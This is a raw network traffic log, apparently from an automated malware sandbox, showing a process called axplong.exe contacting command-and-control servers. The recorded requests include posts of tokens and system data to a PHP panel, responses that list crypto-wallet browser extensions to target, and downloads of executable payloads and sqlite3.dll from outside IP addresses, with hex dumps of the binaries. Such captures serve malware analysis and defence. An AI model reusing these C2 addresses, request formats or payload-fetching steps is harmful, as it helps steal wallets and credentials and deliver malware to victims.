                                                                                                                                                                                                                                                  Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159831047 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                  Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159842014 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                  Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159957886 CET1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                  Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159969091 CET496INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                                                                                                                                  Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159981012 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 78 6c 64 48
                                                                                                                                                                                                                                                  Data Ascii: IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXB
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.159990072 CET668INData Raw: 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 4e 73 5a 33
                                                                                                                                                                                                                                                  Data Ascii: bWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGV
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.165568113 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----AAKEGDAKEHJDHIDHJJDA
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 268
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 44 41 4b 45 48 4a 44 48 49 44 48 4a 4a 44 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: ------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------AAKEGDAKEHJDHIDHJJDAContent-Disposition: form-data; name="message"fplugins------AAKEGDAKEHJDHIDHJJDA--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.391874075 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:52 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Content-Length: 108
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                  Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.426757097 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCG
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 5295
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.426822901 CET5295OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35
                                                                                                                                                                                                                                                  Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.358897924 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:52 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.681937933 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.905766964 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:53 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                  ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 1106998
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.905778885 CET124INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.905886889 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  15192.168.2.450066185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:51.980701923 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 37 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010748001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.672585011 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:51 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  16192.168.2.45006731.41.244.11802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:52.685745001 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377254963 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:53 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 1960448
                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Jan 2025 08:45:30 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6777a3aa-1dea00"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 3e 01 00 00 00 00 00 00 b0 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 00 00 04 00 00 bc 9a 1e 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$inG@ZRZCZUZ\ZBZGRichPEL,e>@[Ao@D& @N@.rsrc@p^@.idata A@ *A@jwcxmuyik@zcgagdls@.taggant0"@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377284050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377295971 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377307892 CET672INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377334118 CET1236INData Raw: ef e9 c1 83 70 b0 0b cf 5a 5d 98 aa 79 69 91 07 f1 61 51 74 c7 36 02 18 cf 0c 00 0e 0b 60 93 44 1a b7 b7 1d 94 2a 16 21 b3 5c 75 e1 49 04 b6 19 6a 72 b4 28 ed 6a 9e 79 ed e2 c0 1f 66 79 92 45 9c 50 c7 7b 12 ba 00 c1 97 9e bc 2b da a4 9b 7e 8d 6b
                                                                                                                                                                                                                                                  Data Ascii: pZ]yiaQt6`D*!\uIjr(jyfyEP{+~kGvB~h+2j{[He}]Ot-6J#(xL2w6;P"ua7")X:!4K/Sd]>b@?Fr?U
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377346039 CET224INData Raw: e0 5e 5c d1 6e fc ac ca e9 3c 8c 22 68 30 5a a9 7c 70 76 0c 54 b5 1a d4 eb 23 4d d3 c8 00 2b b9 2c 10 76 08 ba 5e 0e 93 31 25 7d 30 69 28 c2 e1 67 94 1e 1c 49 4c 38 05 a4 5e b5 5c 69 6e d9 a3 76 36 79 0b e7 63 c1 54 d3 9e 99 20 d0 51 1c 10 bb ba
                                                                                                                                                                                                                                                  Data Ascii: ^\n<"h0Z|pvT#M+,v^1%}0i(gIL8^\inv6ycT Q:`?lLGBCl`p3u\8q9Yrd:G;#0b#ck;q?9-p2t/ZxQwdB
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377358913 CET1236INData Raw: dc 57 6d a3 d5 96 fe e9 da fa 56 1c d7 99 36 f5 e7 6c e5 17 ce ee ac 78 a0 db b0 15 ec 1a 40 10 e8 90 18 09 d9 6e 37 a6 29 6c 8b bb e5 e4 a7 7a 79 58 c9 93 d5 09 c1 62 6a 49 7a 9b 54 39 93 70 97 53 d7 60 27 61 94 3d 11 0c 6b 73 b7 63 60 23 aa 19
                                                                                                                                                                                                                                                  Data Ascii: WmV6lx@n7)lzyXbjIzT9pS`'a=ksc`#u8^Q7M sG@aNS&xm/Hl#v"82xPl0>%}]&!aD5&9=;b*v|cV)7gK6r
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377368927 CET224INData Raw: 15 9d 43 06 6e b5 64 54 d6 c0 35 2c 91 19 88 29 ea a9 3f 5d e1 61 80 17 46 14 a2 43 7c f3 b5 65 c5 ed f0 ba cd 9a df e5 4e 9f 1d 97 dd 5e 0d 8e c9 9f a9 ca 04 a7 b2 cd 3a c5 cc cc 4a ab d6 9f d8 36 8c 9f 34 ca 05 e7 d0 86 21 42 8b 99 72 3d 46 73
                                                                                                                                                                                                                                                  Data Ascii: CndT5,)?]aFC|eN^:J64!Br=FsjkCGk[^:v}}#DG[6L[Um*uve?V9td]]Tbhv(XO_X6Z|"\=M'J-
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377490997 CET1236INData Raw: eb 05 23 79 f0 1b cc 91 67 b7 3d 30 a6 c0 bf 60 05 77 9a bd 4e 76 5b d5 d0 9c 40 f7 1a 9e 39 49 ef 36 cc a7 d7 c6 42 49 d7 cc 60 21 d1 c8 2d fa 0a d0 17 41 f6 bf 6c c6 b7 58 5f 84 9a 24 9e 05 f8 93 33 9c 6d a6 68 5e e6 79 3f bf f6 48 de e9 8e 9a
                                                                                                                                                                                                                                                  Data Ascii: #yg=0`wNv[@9I6BI`!-AlX_$3mh^y?HzXIQ(Ur7h.59HD^6B-Vqmn]%uadJ]:Ajn\f.aoq>u"#DR,9Biu7mH{p1.h]Wv.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.377515078 CET224INData Raw: c1 75 92 15 59 d3 c3 f8 1f bd 3f 63 b9 b6 e8 28 30 ab 90 75 b8 79 b0 61 2f 81 9f 1b e6 a3 91 1f 70 78 f5 54 8b 06 a3 d1 8e 75 0c c3 8f c8 42 7b 00 db 69 0e 9c b4 cd f7 88 c1 92 a8 a9 9f 15 7a da 25 f1 09 1b c6 42 22 89 37 1b 6c b0 f5 54 12 69 6e
                                                                                                                                                                                                                                                  Data Ascii: uY?c(0uya/pxTuB{iz%B"7lTinp1A=~"?~5{0rDZP}W]E,<\2~g^l&Y(&ZBD/4@6<f&lEj[pjPT.&0LG
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:53.382203102 CET1236INData Raw: 5d 38 2d 7c 76 64 80 1e f9 c8 12 28 59 23 c9 a2 f5 45 ae cd c1 09 7a 1f 86 c0 0d f9 f2 b7 6a ee f0 11 09 1a c0 73 90 77 00 2b fa 87 be 0b 39 63 78 b4 ab 11 e7 45 e4 5f 03 b5 82 7b 8f 64 19 6d 35 78 56 1c e3 4d a9 68 89 e6 cf ac 5f 75 0e a2 49 e1
                                                                                                                                                                                                                                                  Data Ascii: ]8-|vd(Y#Ezjsw+9cxE_{dm5xVMh_uI9]jg!W{+H]^dt[kk&^hEUu|M]b\\]}p$mE_"d6DA~A!"8@SAQ\i


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.450068185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.213970900 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 37 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010749001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.919764996 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:55 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.45007531.41.244.11802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.023722887 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 31.41.244.11
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700210094 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
